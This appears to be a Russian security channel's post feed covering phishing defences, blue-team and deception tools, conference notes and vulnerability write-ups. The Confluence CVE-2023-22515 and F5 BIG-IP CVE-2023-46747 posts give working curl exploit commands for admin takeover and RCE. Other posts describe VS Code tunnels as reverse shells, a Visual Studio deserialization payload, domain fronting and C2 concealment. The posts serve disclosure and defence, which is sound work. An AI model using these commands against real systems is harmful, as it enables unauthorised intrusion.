How Much Is The Phish? Evolving Defences Against Evilginx Reverse Proxy Phishing by Kuba Gretzky

Атаки с использованием reverse proxy phishing для обхода MFA на протяжении более 6 лет являются головной болью защитников. Инструменты Evilginx, Modlishka, Muraena позволяют довольно легко обходить software MFA во время проведения фишинговых компаний с целью получения учетных данных и токена второго фактора. При этом основной рекомендацией в большинстве отчетов пентестеров является реализация механизма MFA, при которой значение второго фактора не покидает устройство FIDO Alliance (U2F/FIDO2).

Но в большинстве случаев, особенно в больших организациях, стратегия перехода предполагает время и бюджеты, необходимо найти возможность закупить ключи (yubikey/аналоги) в достаточном количестве, продумать механизм распространения, описать регламенты замены в случае утери и прочие моменты. Поэтому в качестве временного решения возникает необходимость в реализации комплекса компенсирующих мер, затрудняющих проведения подобных атак.

Kuba Gretzky - автор Evilginx в своем выступлении на x33fcon2023 предлагает следующее решение:
🔵 Client-side javascript hostname validation (window.location & document.location) - будет неэффективно в случае использования атакующими Evilginx из-за функциональности sub_filters, появившихся в версии 2.2.0
🔵 Hostname validation js obfucation - обфускация кода валидации хостнейма
🔵 Strings obfucation - replaceAll - обфускация в коде валидации строковых значений
🔵 Unique dynamic javascript hostname validation with obfuscation to every user - будет эффективно против существующих инструментов, но есть вопросы с CDN🙈

Таким образом, необходимо обфусцировать код валидации хостнейма на клиенте, чтобы усложнить возможность подмены с помощью регулярных выражений на проксе, а в идеале сделать уникальным для каждого пользователя.

А про поход Google и Linkedin с использованием Secret Tokens можно узнать посмотрев доклад и демо полностью😜 (продолжительность 33 мин)

#phishing_defence #MFA_bypass_defence #blue_team

Читать полностью…

Всем привет! Сегодня в УрФУ выступил с докладом на тему Kerberos, разобрали некоторые базовые атаки, принцип работы и основные, самые популярные механизмы, которые встречаются при каждом внутреннем пентесте. В докладе старался не погружаться в уж очень страшные дебри, а рассказать все более-менее простым понятным человеческим языком.


Видео:
https://vk.com/video-210214143_456239047

Презентацию прикрепил во вложениях :)

P.S. Само собой, будет продолжение :)

Читать полностью…

Недавно мне на глаза попалась матрица TTPs ransomware группировок по MITRE от Tidal Cyber, о которой хотел сегодня немного рассказать.

Матрица включает в себя тактики, техники и процедуры 40 активных группировок шифровальщиков смапленные на MITRE ATT&CK c референсами на опубликованные отчеты, упоминанием вендоров коммерческого и открытого ПО по фильтрам Test, Detect, Protect, Log, Mitigate для каждой техники. А так же Sigma generic правила для обнаружения техник и процедур этих киберзлодеев из репозитория SigmaHQ.

Данная матрица может пригодится при планировании и реализации Purple Teaming проектов в формате Adversary Emulation, когда реализуются TTPs конкретных группировок попадающих под потрет потенциального злоумышленника по модели угроз заказчика. А шифровальщики представляют актуальную угрозу фактически для любого прибыльного бизнеса независимо от географической и отраслевой принадлежности.

Несмотря на отсутствие открытой статистики и данных об атаках ransomware группировок на российский бизнес наивно полагать, что киберзлодеи просто обходят стороной нашу страну. Одним из самых известных публичных кейсов были атаки группировки OldGremlin в 2021-2022 годах направленный на российские компании из различных сфер деятельности (промышленное производство, логистика, страхование, ритейл, недвижимость и разработка ПО). Согласно данным Group-IB рекордная сумма выкупа достигала 1 млрд рублей.

PS: Кстати, на одной из ближайших конференций буду рассказывать об особенностях проведения Purple Teaming в формате Adversary Emulation, скоро будет анонс😎

#purple_teaming #adversary_emulation #ransomware_TTPs

Читать полностью…

FalconHound - blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion.
Defenders think in lists. Attackers think in graphs. Defenders can leverage attack graphs to make more lists. (c) Olaf Hartong

FalconHound представляет собой утилиту на go, которая решает задачи агрегации и обогащении логов SIEM в визуальном представлении графов на основе Neo4j базы данных BloodHound для последующего анализа защитниками. Основная идея - запускать инструмент регулярно по расписанию (scheduled task/cron job) чтобы иметь под рукой актуальную информацию.

Возможности (подробная информация доступна в презентации автора утилиты):
🔵 Adding, removing or timing out sessions in the graph, based on logon and logoff events.
🔵 Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.
🔵 Adding CVE information and whether there is a public exploit available to the graph.
🔵 All kinds of Azure activities.
🔵 Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.
🔵 Adding new users, groups and computers to the graph.
🔵 Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownerships of certain entities.

В текущей реализации, к сожалению поддерживает только следующие источники для агрегации логов:
🔵 Azure Sentinel
🔵 Azure Sentinel Watchlists
🔵 Splunk
🔵 Microsoft Defender for Endpoint
🔵 MS Graph API (early stage)
🔵 CSV files

Интересный инструмент, который к сожалению, из коробки не подходит для практического использования в наших широтах, так как нуждается в доработке относительно добавления новых источников данных. Но в данном случае сама концепция визуального представления логов возможно вдохновит наших вендоров SIEM подумать об этом🥹

Читать полностью…

DeTT&CT - Detect Tactics, Techniques & Combat Threats (вводная часть)

Многим хорошо знакома матрица ATT&CK от MITRE, но не многие знают о существовании DeTT&CT от Marcus Bakker. Про этот полезный инструмент пойдет речь в этой заметке.

На практике довольно часто во время обсуждения сценариев в рамках Red/Purple Teaming проектов заказчики не рассматривают некоторые векторы реализации недопустимых событий бизнес-рисков по причине уверенности, что данная техника и процедуры в теории полностью покрываются техническими защитными решениями или методично разработанными инструкциями и регламентами досконально описывающими процессы.😎

На примере, ..."наш вендор Email Gateway хлебом клялся гарантировал, что в составе решения есть компонент, обеспечивающий функциональность песочницы и вредоносные ссылки/вложения сканируются на этапе доставки сообщения и блокируются в автоматизированом режиме"...
В теории кажется, что все в безопасности, на практике же на следующий вопрос ... "а умеет ваш sanbox обойти капчу, чтобы скачать и выполнить вложение в изолированной среде" ... обычно ответа нет 🤷‍♀️

Именно на такие вопросы помогает ответить DeTT&CT. Утилита позволяет перед началом проекта оценить текущее теоретическое покрытие и смапить защитные решения и процессы обнаружения/реагирования на процедуры в рамках техник и сабтехник по MITRE в формате heatmap, чтобы по результатам реализации проекта сравнить теорию с практикой. Обычно результаты существенно отличаются🙈

Полученные данные оцениваются по критериям: покрытие телеметрией локально и централизованно, качество обнаружения, процессы реагирования и предотвращения в автоматическом и ручном режиме и далее используются в качестве фильтра для ATT&CK Navigator для визуального отображения в виде тепловой карты.

В следующих постах из этой серии, я подробно расскажу и возможно покажу в формате демо как пользоваться DeTT&CT

#DeTTECT #red_teaming #purple_teaming

Читать полностью…

Мой хороший друг, бывший коллега и teammate - D00Movenok написал и выложил в открытый доступ крутую штуку - BounceBack, которая скоро станет ключевым компонентом обеспечивающим функциональность редиректоров в нашей Red Teaming инфраструктуре.

BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. It uses real-time traffic analysis through various filters and their combinations to hide your tools from illegitimate visitors.

🔴 Редиректор с расширяемой функциональностью WAF на основе boolean-based правил.
🔴 Встроенный список IPv4 адресов cyber security вендоров (сканеров, песочниц и пр) для правил блокировки на основе адреса источника запроса.
🔴 Malleable C2 Profile parser для валидации структуры входящего трафика от имплантов прямо на редиректоре.
🔴 Встроенная функциональность обеспечивающая реализацию Domain Fronting.
🔴 Возможность проверки и автоматической блокировки адресов входящих запросов по IP Geolocation/reverse lookup.
🔴 Поддержка HTTP(S), DNS, Raw TCP/UDP, логгирование запросов и другое.

Инструмент получился крутой и определенно заслуживает внимания Red Teaming сообщества! Happy Red Teaming!
PS: А еще у D00Movenok есть свой канал, где он постит ссылки на интересные статьи и заметки.

#red_team_infra #redirector #BounceBack

Читать полностью…

Начнем неделю с критичной уязвимости CVE-2023-22515 (оценка по CVSS=10) в Confluence Server and Confluence Data, эксплуатация которой позволяет неаутентифицированному злоумышленнику создать новый аккаунт администратора на уязвимом сервере приложения.

В Atlassian уязвимость классифицирована как Broken Access Control, но специалисты Rapid7, опубликовавшие на прошлой неделе технические подробности на основе Patch Diffing, классифицируют багу как CWE-20: Improper Input Validation. В прочем оставим вопросы семантики и рассмотрим причины возникновения и способ эксплуатации этой уязвимости. Atlassian Confluence монструозное приложение на Java создано на основе Apache Struts framework, а его ключевым компонентом является XWork2, который имеет функциональность задавать параметры Java objects с помощью параметров http запросов, на примере запроса /test.action?one=a equals to setOne()='a' alternatively /test.action?one.two=a equals to getOne().setTwo()="a"

После установки новой инсталляции Confluence процесс создания и конфигурации аккаунта администратора реализован с помощью запроса на ручку /setup/setupadministrator.action через браузер, которая становится недоступна после завершения процесса конфигурации, с использованием interceptor SafeParametersInterceptor. Метод getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(true) отвечает за проверку статуса установки, уязвимость возникает из-за того что атакующий может передать в качестве параметра http запроса setSetupComplete(false)
🔴 curl -vk http://target:port/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false

Далее обратиться на опять доступную ручку /setup/setupadministrator.action для создания пароля нового аккаунта администратора
🔴 curl -vk -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=1337haxor&fullName=1337haxor&email=1337haxor%40localhost&password=1337&confirm=1337&setup-next-button=Next" http://target:port/setup/setupadministrator.action

Далее для завершения установки необходимо отправить запрос на /setup/finishsetup.action
🔴 curl -vk -X POST -H "X-Atlassian-Token: no-check" http://target:port/setup/finishsetup.action
🤙Profit, теперь1337haxor админит😎 уязвимый Confluence

⚙️POC: https://github.com/Chocapikk/CVE-2023-22515
🪲Уязвимые версии ПО: 8.0.0 - 8.5.1
✅ Рекомендации: Патч уже доступен, необходимо обновиться до версии 8.3.3

PS: Patch ASAP🌪 Уязвимость активно эксплуатируется в дикой природе, а в России на данный момент ~4k потенциально уязвимых серверов торчат в интернет.

#confluence #CVE-2023-22515

Читать полностью…

На выходных случайно попалась на глаза очередная статья на тему создания Red Teaming инфраструктуры.
Я уже несколько раз писал о разных вариантах реализации инфры для обеспечения повышенных требований OPSEC для Red Team проектов.

В данном случае, автор предлагает использовать ресурсы Microsoft Azure в качестве площадки для размещения атакующей инфраструктуры, что не очень актуально в текущей ситуации для заказчиков из России. К тому же предлагается вполне стандартная схема архитектуры, в качестве С2 используется Brute Ratel за Nginix, а в качестве редиректоров используются сервис Azure Function, обеспечивающий serverless реализацию функциональности редиректоров на трастовом домене *.azurewebsites.net

В целом ничего нового за исключением информации о том, что Azure опять начал поддерживать Domain Fronting с 25 сентября 2023 года с использованием Edgio CDN из Azure Marketplace, который вполне можно использовать как самостоятельный сервис зарегистрировавшись на edg.io и прятаться за трастовыми доменами Microsoft ajax.microsoft.com, ajax.aspnetcdn.com, do.skype.com, msdn.microsoft.com и прочих и даже зарегать свой поддомен на *.edgio.link

#red_team_infra #domain_fronting #edgio

Читать полностью…

На прошлой неделе был представлен фреймворк JA4+ Network Fingerprinting для снятия отпечатков с трафика.

Новый набор методов фингерпринтинга трафика призван заменить стандарт JA3 TLS fingerprint используемый с 2017 года, повысив эффективность идентификации вредоносной активности на уровне сети с помощью совокупности характеризующих признаков. Так как в отличии от предшественника, который опирался только на содержание Client Hello/Server Hello packets, JA4+ использует:

🔵 JA4: TLS Client Fingerprinting (TCP/QUIC, TLS version, SNI, Cypher Suites, Extensions, ALPN Application-Layer Protocol Negotiation)
🔵 JA4S: TLS Server/Session Fingerprinting (TCP/QUIC, TLS version, SNI, Extensions, ALPN, Cypher Suite Chosen)
🔵 JA4H: HTTP Client Fingerprinting (HTTP methods, HTTP version, Headers, Cookie, Referer, etc)
🔵 JA4L: Light Distance Locality (Measures the distance between a client and a server by looking at the latency between the first few packets in a connection)
🔵 JA4X: X509 TLS Certificate Fingerprinting (Hash of Issuer RDNs, Hash of Subject RDNs, Hash of Extensions)
🔵 JA4SSH: SSH Traffic Fingerprinting (Interactive/Reverse Session, File Transfer)

Заявленная функциональность предоставляет широкие возможности идентификации северов различных С2 фреймворков, перехватов сессий, реверс SSH, и даже можно вычислять по IP физическое местоположение используя триангуляцию (на скрине)

#JA4+ #network_fingerprinting

Читать полностью…

Сегодня предлагаю поговорить об RCE уязвимости высокого уровня критичности CVE-2023-42793 в TeamCity от JetBrains, обнаруженной специалистами Sonar’s Vulnerability Research Team.

TeamCity - это популярная CI/CD-платформа общего назначения на Java, первый релиз которой состоялся в далеком 2006 году, за это время компания прошла долгий путь и завоевала умы и сердца многих миллионов разработчиков и devops-инженеров по всему миру.
Но к сожалению, как и в любом другом ПО в TeamCity находятся критичные уязвимости, такие как CVE-2023-42793 (оценка по CVSS=9.8), которая позволяет неаутентифицированному злоумышленнику получить возможность удаленного выполнения произвольного кода на сервере уязвимого приложения.

Эксплуатация уязвимости заключается в обходе механизма аутентификации при отправке запроса, соответствующему выражению "/**/RPC2" на недокументированную ручку /app/rest/users/id:1/tokens/RPC2 для получения значения authentication token акаунта администратора приложения по умолчанию.

Тривиальная эксплуатация в совокупности с серьезностью потенциальных последствий и широкой поверхностью атак на цепочку поставок гарантируют повышенный интерес со стороны злоумышленников всех мастей в преддверии выходных, поэтому patch ASAP🌪

⚙️POC: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-42793.yaml
🪲Уязвимые версии ПО: TeamCity до версии 2023.05.4, включая 2022.04.x, 2022.10.x, and 2023.04.x
✅ Рекомендации: Патч уже доступен, необходимо обновиться до версии 2023.05.4.

PS: Желаю всем удачного окончания рабочей недели и хороших выходных!

#TeamCity #RCE #CVE-2023-42793

Читать полностью…

На прошлой неделе, уважаемый Александр Попов обновил релиз своего шикарного инструмента kernel-hardening-checker для проверки конфигурации безопасности ядра Linux.

Утилита представляет из себя чек-лист проверки параметров безопасности Linux kernel для архитектуры на X86_64; X86_32; ARM64; ARM который позволяет автоматизировать процесс security hardening ядра:
🟣 Kconfig options (compile-time)
🟣 Kernel cmdline arguments (boot-time)
🟣 Sysctl parameters (runtime)

Рекомендации по процессу security hardening ядра реализованы на основе:
🟣 KSPP recommended settings
🟣 CLIP OS kernel configuration
🟣 Last public grsecurity patch (options which they disable)
🟣 SECURITY_LOCKDOWN_LSM patchset
🟣 Direct feedback from the Linux kernel maintainers

Внимание! Изменение параметров безопасности ядра Linux может повлиять на производительность системы и функциональность ПО, поэтому необходимо обязательно протестировать рекомендованные настройки в лабораторной среде.

#kernel_security_hardening #purple_teaming

Читать полностью…

В качестве практических рекомендаций по противодействию киберзлодеям по результатам Purple Teaming очень высокую эффективность обеспечивают методики Active Defence & Cyber Deceprion, которые направлены на замедление действий и дезинформирование злоумышленников.

Речь идет про разнообразные приманки и ловушки, "уязвимые" сервисы на серверах, canary учетки и API ключи "забытые" в скриптах на smb-шарах, kerberoast honey-аккаунты и многое другое.

На рынке существуют коммерческие платформы, обеспечивающие подобную функциональность, но даже при отсутствии бюджетов можно реализовать методики Active Defence & Cyber Deceprion буквально на коленке, используя решения с открытым исходным кодом.
Примером такого решения является DejaVU - Open Source Deception Platform

Архитектурно фреймворк состоит из 2 компонентов:
🟣DejaVu Engine: Компонент обеспечивающий развертывание и конфигурацию различных приманок и ловушек
🟣DejaVu Console: Дашборд в веб-интерфейсе, позволяющий централизованно анализировать полученные алерты

Приманки и ловушки в составе фреймворка:
🟣Server Decoys: MYSQL; SNMP; Custom HTTP Decoy - You can configure this with a custom HTML template; TELNET; SMB Server with custom files; FTP; TFTP; Web Server - Tomcat, Apache, Basic Auth; SSH Interactive and Non-Interactive; SMTP; RDP Interactive and Non-Interactive; VNC; HONEYCOMB (To capture events from Honey Docs); ICS/SCADA Decoys.
🟣Client Decoys: NBNS Decoy; MITM Decoy; SSDP Client; Email Client.
🟣BreadCrumbs: Honey Docs; HoneyHash - Injects creds into memory; Kerberoast Honey Account.

Лайк, если тоже долго сомневаетесь стоит ли использовать креды интересной учетки, найденные в скрипте на богом забытой шаре😎

#purple_teaming #cyber_deceprion #DejaVu

Читать полностью…

KazHackStan 2023: Итоги

Это было очень-очень круто! Потрясающая конференция, фантастическая атмосфера, такие эмоции очень трудно передать словами, это нужно просто прочувствовать😍

Для меня KazHackStan это:
💜 Высочайший уровень организации мероприятия, ощущения что ребята из TSARKA продумали и предусмотрели каждую деталь до самых мельчайших подробностей! Мне сложно представить сколько месяцев кропотливой работы за этим стоит, они буквально вложили частичку своей души, чтобы подарить нам эти незабываемые 5 дней.

💜 Легендарное казахское гостеприимство - это не просто красивые слова и древняя традиция, это непередаваемые ощущения когда хозяева стараются сделать все так, чтобы гости чувствовали себя лучше чем дома. Ощущения, когда тебе по-настоящему искренне рады, разместят в самом лучшем отеле, завалят подарками, будут кормить и поить до отвала и еще с собой завернут чтобы хватило на 3 дня😜
Улкен рахмет!

💜 Крутейшая программа, спикеры, доклады и киберполигон, 4000+ посетителей с горящими глазами, а главное дружеская атмосфера! Возможность увидеть старых друзей и завести новых, спеть в караоке хали-гали паратрупер, районы-кварталы и даже get low🥹 вместе подняться в горы, покататься на лошадях, покушать барашка и многое многое другое!

До встречи на KazHackStan 2024 ❤️

Читать полностью…

На канале AM Live доступна запись эфира "Лучшие практики наступательной безопасности (Offensive Security)" на которой мы с коллегами обсуждали методы оценки уровня зрелости ИБ, какие задачи позволяют решить анализ защищенности и bug bounty, в чем принципиальная разница между Red Team и классическими пентестами и многое другое на примере простых и понятных сравнений и аналогий:

"Пентест - это знакомство без определенных ожиданий, Red Team - это тусовка с конкретной целью, Bug bounty - клуб быстрых знакомств, где заранее неизвестно, кто придет и будет участвовать" (с) Сергей Рысин

А что же такое Purple Teaming, если следовать логике подобного сравнения? Оставляйте свое мнение в комментариях.

Читать полностью…

На этой неделе, 6 сентября 2023 в 11:00 на конференции AM Live обсудим наступательную кибербезопасность. Поговорим про теорию и практику Red Teaming, Purple Teaming, пентестов и bug bounty.

Читать полностью…

Netlas CookBook

Я уже несколько раз писал про Netlas, на прошлой неделе ребята опубликовали подробный гайд как пользоваться сервисом на конкретных примерах, синтаксис запросов, скрипты для автоматизации и другое полезное.

Из интересного для себя выделил:
Pentest
Search subdomains - netlas search "domain:*.github.com OR host:*.github.com" -f json
Search for sites with specific vulnerabilities - netlas search "cve.name:CVE-2022-22965" -f json
Search for sites with vulnerabilities that contain a certain word in their descriptions - netlas search "cve.description:weblogic AND cve.has_exploit:true" -f json
Search by server http header - netlas search 'http.headers.server:"yawcam"' -f json
Search servers with CVEs by favicon hash - netlas search "http.favicon.hash_sha256:ebaaed8ab7c21856f888117edaf342f6bc10335106ed907f95787b69878d9d9e" -f json
Search servers with CVEs by tag name - netlas search 'tag.name:"adobe_coldfusion"' -f json
Search vulnerable servers and devices near you (or any other location) - geo.city:London AND cve:*
Search for login/admin panels - http.title:admin http.title:panel
Search for vulnerable database admin panels - http.title:(phpPgAdmin OR pgadmin) cve:*
Search for sites vulnerable to SQL injection - netlas search "http.body:mysql_fetch_array http.body:warning" -f json

OSINT
Search person's nickname or email in WHOIS contacts - netlas search "whois.related_nets.contacts.emails:sweetwater*" -f json
Search person's nickname or email in title and body of web page - netlas search "http.title:sweetwater OR http.body:sweetwater" -f json
Search links to "juicy info files" on subdomains of the company's website - netlas search "uri:*lidl.* AND http.body:pdf"
Phone number mentions search - netlas search "http.body:1?234?567?89?99 OR http.body:12345678999 OR http.body:1234?5678?999" -f json
Search file mentions (looking for content that may be infringing on copyrights) - netlas search "(http.title:alla OR http.body:alla) AND http.body:*.mp3" -f json
Domain WHOIS information gathering - netlas host github.com -f json
Search by FTP server's banners text - netlas search 'ftp.banner:"Collado"' -f json
Search for contact information in SSL certificates - netlas search "certificate.issuer.street_address:*mcgill*" -f json
Using Netlas as an alternative to the WayBack Machine - http.title:"github.com"
Search related websites - http.body:UA-23870775

Crypto Investigations
Search mining farms - http.headers.www_authenticate:XMR-Stak-Miner
Search for websites infected with cryptominers - netlas search "http.body:coinhive.min.js domain:*"
Search vulnerable Bitcoin nodes - netlas search "port:8333 cve:*"

#netlas #assets_management #subdomains_enum

Читать полностью…

Нас 400 человек! Большое спасибо за доверие!🙏 В честь этой знаменательной цифры, небольшой опрос

Читать полностью…

На этой неделе отличились F5 Networks, возглавив рейтинг критичных уязвимостей с двумя багами: CVE-2023-46747 (оценка по CVSS=9.8) и CVE-2023-46748 (оценка по CVSS=8.8)

F5 BIG-IP - это платформа в состав которой входят аппаратные средства и программные модули для обеспечения сетевой безопасности.😎

Уязвимость CVE-2023-46748 в BIG-IP Configuration utility представляет собой классическую SQL-инъекцию в контексте аутентифицированного пользователя.

Уязвимость CVE-2023-46747 Unauth RCE via AJP Smuggling - позволяет неаутентифицированному злоумышленнику получить возможность удаленного выполнения кода с помощью эксплуатации Request Smuggling в Apache JServ (AJP).

Request Smuggling возникает из-за некорректной обработки заголовков Content-Length/Transfer-Encoding запросов от Apache HTTPd к Tomcat по AJP, что позволяет отправить POST-запрос размером 516 bytes (0x204 bytes) на ручку /tmui/Control/form/ с AJP атрибутом remote_user = admin и со значением null для заголовка REMOTEROLE для обхода аутентификации при создании нового пользователя с правами администратора👍
Для обхода CSRF необходимо чтобы конкатенированное значение параметров _bufvalue и _timenow соответствовало значению base64 SHA1 заголовка Tmui-Dubbuf и размеру 516 bytes (0x204 bytes).

Далее, с новой учеткой админа, с помощью встроенной функциональности выполнения команд на /mgmt/tm/util/bash получаем RCE😎
curl -sk -u 'USER:PASS' -H 'Content-Type: application/json' -X POST \
-d '{"command": "run", "utilCmdArgs": "-c \"whoami\""}'
https://$IP:8443/mgmt/tm/util/bash

🔎Shodan & Fofa: title="BIG-IP®- Redirect"
⚙️POC: https://github.com/W01fh4cker/CVE-2023-46747-RCE
✅ Рекомендации: Патч уже доступен, необходимо обновиться.

PS: Желаю всем удачной пятницы и хороших выходных!

Читать полностью…

Кибердом: Первые впечатления

На прошлой неделе у меня была возможность посетить Кибердом, который открылся 19 октября в самом центре Москвы, поэтому хотелось поделиться своими впечатлениями.

Согласно информации на сайте, философия проекта заключается в создании локации для эффективного взаимодействия ИБ специалистов, бизнеса, государства, будущих кадров и построения сильного бренда российской кибербезопасности.

Эта простая и логичная концепция необычайна глубока в своей эффективности и области применения, так как реализует нашу основную потребность во взаимодействии и коммуникации с людьми разделяющими общие ценности и интересы. Эта потребность обеспечила человечеству как виду преимущество с древнейших времен. Способность делиться опытом, учиться друг у друга, договариваться и объединять усилия в любой области деятельности, неважно будь то охота на мамонта или борьба с кибер-угрозами. Именно по этой причине большинство из нас посещает ИБ конференции и митапы и очень благодарны организаторам за возможность послушать выступления, научиться чему-нибудь новому, пообщаться со старыми друзьями и познакомиться с новыми. Оказаться в среде таких же людей, которые утром встают с постели с целью сделать этот мир более безопасным местом.

Звучит немного пафосно, но мне кажется это действительно так. Именно это и делает из конкурентов из разных компаний - дружное сообщество, которое двигает вперед всю отрасль кибербезопасности.

Читать полностью…

Project Discovery анонсировали релиз Nuclei v3

Nuclei - сканер уязвимостей c открытым исходным кодом, по моему мнению не нуждается в представлении, так как всего за 3,5 года своего существования стал одним из любимых инструментов offensive security специалистов и фактически стандартом индустрии.

В новой версии появилось:
🔴 Code Protocol
Возможность выполнения скриптов на bash, Python, Javascipt, а также других инструментов (sqlmap и пр) прямо из YAML файлов темплейтов.
🔴 Template Signing & Verification
Возможность подписывать и проверять кастомные темплейты собственными ключами на основе ECDSA алгоритма, для обеспечения целостности (особенно актуально в контексте первой фичи с исполнением кода)
🔴 JavaScript Protocol
Интеграция JavaScript с помощью Goja позволит создавать шаблоны с автоматизацией сложной эксплуатации.
🔴 Multi-Protocol Engine
Новый движок с поддержкой нескольких протоколов в одном шаблоне для автоматизации многоступенчатой эксплуатации.
🔴 Flow Template Engine
Декларирование последовательности выполнения запросов с использованием нескольких протоколом прямо в YAML файлах темплейтов
🔴 И другое...

PS: Подход ребят из Project Discovery относительно поддержки, улучшений и доработки функциональности Nuclei бесспорно заслуживает уважения особенно для не коммерческого продукта! Огонек, если тоже так думаете🔥

Читать полностью…

Давненько мы уже не разбирали отчеты об атаках APT группировок, поэтому сегодня предлагаю посмотреть на свежий отчет - Threat Actor deploys Mythic’s Athena Agent to target Russian Semiconductor Suppliers от Cyble Research Labs

⚫️ В качестве вектора для получения первоначального доступа неизвестные киберзлодеи использовали фишинг по электронной почте с полезной нагрузкой во вложении в формате архива WinRAR.

⚫️ Содержание архива представляло собой файл в формате .pdf и одноименный файл с двойным расширением pdf .cmd, с пробелом после pdf, запуск полезной нагрузки осуществлялся с помощью эксплуатации уязвимости CVE-2023-38831 в WinRAR до версии 6.23. Если коротко суть этой баги в том, что при извлечении безвредного файла WinRAR распаковывал еще и одноименный файл-dropper с пробелом в названии во временную папку

⚫️ Вредоносный скрипт содержал Base64-encoded PowerShell, который скачивал и запускал decoy-pdf'ку для отвлечения внимания. Далее скачивал основную полезную нагрузку в формате .exe в директорию \AppData\Local\MicrosoftWindows\Ringtone\и создавал задание планировщика Task Scheduler на запуск каждые 10 минут.

⚫️ В качестве импланта использовался агент Athena С2 фреймворка Mythic (о котором ранее писали тут), причем скомпилированный в режиме self-contained (базовая функциональность агента + .NET runtime), который в распакованном виде весит ~60mb😎

Примечательно, что для противодействия обнаружению на уровне сетевой коммуникации агентов с С2 серверами киберзлодеи использовали C3 (Custom Command and Control) от WithSecure (ex F-Secure), а именно релей через Discord. Этот инструмент обычно используется пентестерами для сокрытия своего присутствия на Red Team проектах.

#apt_reports #CVE-2023-38831 #Mythic_C2 #C3

Читать полностью…

На PHDays12 в рамках моего доклада мы рассматривали способы получения первоначального доступа с помощью фишинга с использованием проекта Visual Studio.

Сегодня были опубликованы технические подробности и POC нового способа выполнения полезной нагрузки при открытии проекта .sln и .csproj
Суть метода заключается в следующем, при открытии проекта Visual Studio автоматически создает скрытую папку .vs в корневой директории проекта, которая содержит бинарный файл .suo
Согласно документации при выполнение этого файла Visual Studio использует вызов функции IVsPersistSolutionOpts#LoadUserOptions для загрузки сериализованного объекта VSCorePackage с использованием функции vsToolboxService.OnLoadOptions(stream)
Далее вызов BinaryFormatter.Deserialize десериализует stream в выполняемый объект.

Таким образом, мы можем записать paylod сгенерированный ysoserial.net в .suo и при открытии проекта в Visual Studio получим выполнение кода на рабочей станции разработчика.
В качестве бонуса проверка Trust Zones при загрузке отключена по умолчанию в последней версии Visual Studio, а MOTW просто игнорируется😎

❓Что делать:
🔴 Атакующим:  POC - https://github.com/cjm00n/EvilSln
🔵 Защитникам: Mitigations - https://devblogs.microsoft.com/visualstudio/improving-developer-security-with-visual-studio-2022/

PS: Microsoft не планирует это фиксить, так как "Opening a Visual Studio project is an insecure operation."😁

Читать полностью…

Как превратить VS Code в reverse shell

C июля 2023 года в VS Code добавили возможность подключения к любимой среде разработки на удаленной машине с аутентификацией через учетную запись Github. Казалось бы что может пойти не по плану😁

Атакующий просто получает доступ к рабочей станции разработчика, а дальше сумрачные гении из Redmond уже обо всем позаботились, чтобы обеспечить надежный канал С2 необходимо:
🔴 просто использовать установленный VSCodeCLI
🔴 а если жертва фанат Sublime/Notepad++ скачать подписанный бинарь code.exe  (при этом MOTW, SmartScreeen и Defender как и положено отдыхают🏖)
🔴 запустить .\code.exe tunnel
🔴 пройти аутентификацию  в браузере атакующего с использованием полученного Github Device Code Authentication

Получаем полноценный powershell reverse shell c tab completion, history, syntax highlighting прямо в браузере по адресу https://vscode.dev/tunnel/x.x.x.x/C:/temp или в приложении VS Code.
Взаимодействие на уровне сети происходит по WebSockets на https://global.rel.tunnels.api.visualstudio.com

❓Что делать:
🔴 Атакующим:  POC https://badoption.eu/blog/2023/01/31/code_c2.html
🔵 Защитникам: Mitigations  https://ipfyx.fr/post/visual-studio-code-tunnel/

#C2_lolbin #vs_code_tunnel #red_teaming

Читать полностью…

3 ноября 2023 в Алматы в отеле DoubleTree by Hilton впервые пройдёт МЕЖОТРАСЛЕВОЙ ФОРУМ ДИРЕКТОРОВ ПО ИБ CISO EURASIA 2023.

📌250+ представителей ИБ комьюнити из разных отраслей от финтеха до нефтянки;
📌15+ тематических сессий, 2 трека;
📌40+ экспертных докладчиков;

🔥УЧАСТИЕ ДЛЯ CISO и ИБ СПЕЦИАЛИСТОВ БЕСПЛАТНОЕ!🔥

В программе:

➖Интенсивное погружение: стратегия, практики, решения;
➖Взгляд в будущее: выступления приглашённых международных визионеров;
➖Фокус: вызовы безопасной гибридной облачной инфраструктуры;
➖Solution showcase: разбор практик применения с обратной связью от пользователей;
➖Практическая панель: интегрированная безопасность промышленных предприятий;
➖Безопасность данных: круглые столы с регулятором для обсуждения узких мест в законодательстве;
➖DevSecOps: будущее безопасной разработки;
➖Know-how: воркшопы и матер-классы от международных практиков;
➖Где брать кадры? Программы подготовки молодых специалистов и развитие ИБ компетенций.

Регистрация и подробная программа доступна на сайте!

Читать полностью…

Несколько лет назад я делал доклад Золотой век Red Teaming С2 фреймворков, в рамках которого мы рассматривали особенности, модули и функциональность различных популярных С2 фреймворков с открытым исходным кодом.

Но на тот момент одного из моих любимых решений Mythic С2 еще просто не существовало, а этот инструмент представляет очень достойною альтернативу любым коммерческим решениям, обеспечивает большое разнообразие агентов и каналов скрытого взаимодействия. Микросервисная архитектура обеспечивает широкие возможности кастомизации при генерации пейлоадов, а использование GraphQL API предоставляет возможности автоматизации рутинных задач Red Team оператора.

Прошлой весной авторы Mythic С2 выпустили новый релиз фреймворка:
🔴 полностью переписали с Python3 на Golang;
🔴 добавили контейнеры обеспечивающие функциональность детального логгирования всех действий операторов и уведомлений в ваши любимые чатики с помощью Webhooks;
🔴 добавили агенты на Golang, обеспечивающие кроссплатформенность;
🔴 UI/UX улучшения (Tagging, Graph groups, etc);
🔴 интеграция с Jupiter Notebooks❤️ для автоматизации рутинных задач;
🔴 и многое другое

Рекомендую обратить внимание на этот С2 во время планирования инфраструктуры для проведения следующего проекта в формате Red Teaming😎

#red_teaming #Mythic_C2

Читать полностью…

В качестве темы для пятничного поста предлагаю немного поговорить про потенциал LLM (large language models)

